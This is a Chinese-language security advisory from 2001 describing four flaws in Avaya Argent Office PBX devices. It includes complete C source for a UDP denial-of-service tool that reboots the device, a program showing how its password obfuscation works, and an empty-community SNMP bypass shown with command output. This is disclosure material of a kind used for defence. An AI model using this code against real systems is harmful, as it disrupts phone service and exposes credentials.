Avaya Argent Office 存在多个漏洞发布时间:2001-08-08 更新时间:2001-08-08 严重程度:中 威胁程度:本地拒绝服务 错误类型:设计错误 利用方式:服务器模式 受影响系统 Avaya Argent Office详细描述 Avaya Argent产品是集成PBX,网络连接,拨号服务的解决方案,其中 存在几个安全漏洞,不过其大部分是本地网络连接,所以问题不是很大。 1,本地拒绝服务攻击 通过对端口53发送没有负载的UDP信息包会导致Argent Office重新启动。 /* argent_kill.c (c) 2001 Jacek Lipkowski sq5bpf@acid.ch.pw.edu.pl Reboots an Argent Office box by sending udp packets with no payload to port 53 usage: argent_kill ip_address */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <unistd.h> main(int argc, char *argv[]) { struct sockaddr_in addr; struct hostent *host; int s; s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if (s==-1) { perror("socket()"); exit(1); } host=gethostbyname(argv[1]); if (host==0) { herror("gethostbyname"); exit(1); } memcpy(&addr.sin_addr,host->h_addr,host->h_length); addr.sin_port=htons(53); addr.sin_family=AF_INET; if (connect(s,&addr,16)==-1) { perror("connect()"); exit(1); } for (;;) { send(s,0,0,0); sleep(1); printf("."); fflush(stdout); } close(s); } 2,配置密码容易解密 重新启动需要通过tftp获得如下文件: nasystem/rebootwhenfree/00e007002666/password// 这里的00e007002666是MAC地址,而密码的加密机制很简单。 这个信息可以通过嗅探获得,下面的程序类似加密机制。 /* argent_obfuscate.c (c) 2001 Jacek Lipkowski sq5bpf@acid.ch.pw.edu.pl demonstrates how the password obfuscation mechanism works in argent office products */ main(int argc,char **argv) { int i; unsigned char buf[32]; strcpy(&buf,argv[1]); for (i=0;i<strlen(argv[1]);i++) printf("0x%2.2X ",buf[i]+0x11-i); printf("\n"); } 如密码 'idiocy'加密后的十六进制值为下: $ ./argent_obfuscate idiocy 0x7A 0x74 0x78 0x7D 0x70 0x85 3,SNMP可操作 软件通过如下类似方法进行SNMP认证: if (strncmp(n,c,strlen(n))==0) { ok, valid community} 这里的C是community string。因此如果密码长度为0则验证通过: ~$ snmpwalk 192.168.1.234 "" system.sysDescr.0 system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138) 4,tftp请求广播 系统默认配置通过tftp请求叫HoldMusic 的文件俩获得广播地址,你就 可以改变文件而播放其他歌曲。 测试代码 见描述部分 解决方案 尚无 相关信息 Andra Sp. z o.o. Jacek Lipkowski sq5bpf@andra.com.pl |
